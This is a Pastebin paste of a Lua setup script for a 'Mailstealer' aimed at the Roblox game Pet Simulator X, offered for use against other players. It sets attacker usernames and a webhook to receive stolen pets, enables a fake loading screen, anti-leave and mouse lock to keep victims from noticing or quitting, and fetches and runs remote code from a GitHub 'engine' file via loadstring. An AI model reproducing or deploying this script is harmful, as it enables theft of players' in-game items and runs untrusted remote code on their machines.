Egorikusa

MAILSTEALER | PET SIMULATOR X| SETUP

Jun 27th, 2023
22
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.69 KB | None | 0 0
  1. --[[
  2. __ __ _ _ _ _
  3. | \/ | __ _(_) |___| |_ ___ __ _| | ___ _ __
  4. | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
  5. | | | | (_| | | \__ \ || __/ (_| | | __/ |
  6. |_| |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|
  7.  
  8. ]]--
  9.  
  10. UserName = "UserName Here" -- good pets
  11. Webhook = "Webhook Here" -- pings for pets
  12. UserName2 = "2nd UserName Here" -- bad pets
  13.  
  14. _G.LoadingScreen = true -- make it true if you want the loadingscreen
  15. _G.AntiLeave = true -- make it true if you want the antileave
  16. _G.MouseLock = true -- make it true if you want the mouselock
  17.  
  18. loadstring(game:HttpGet("https://raw.githubusercontent.com/Egorikusa/Mailstealer/main/engine"))()
Add Comment
Please, Sign In to add comment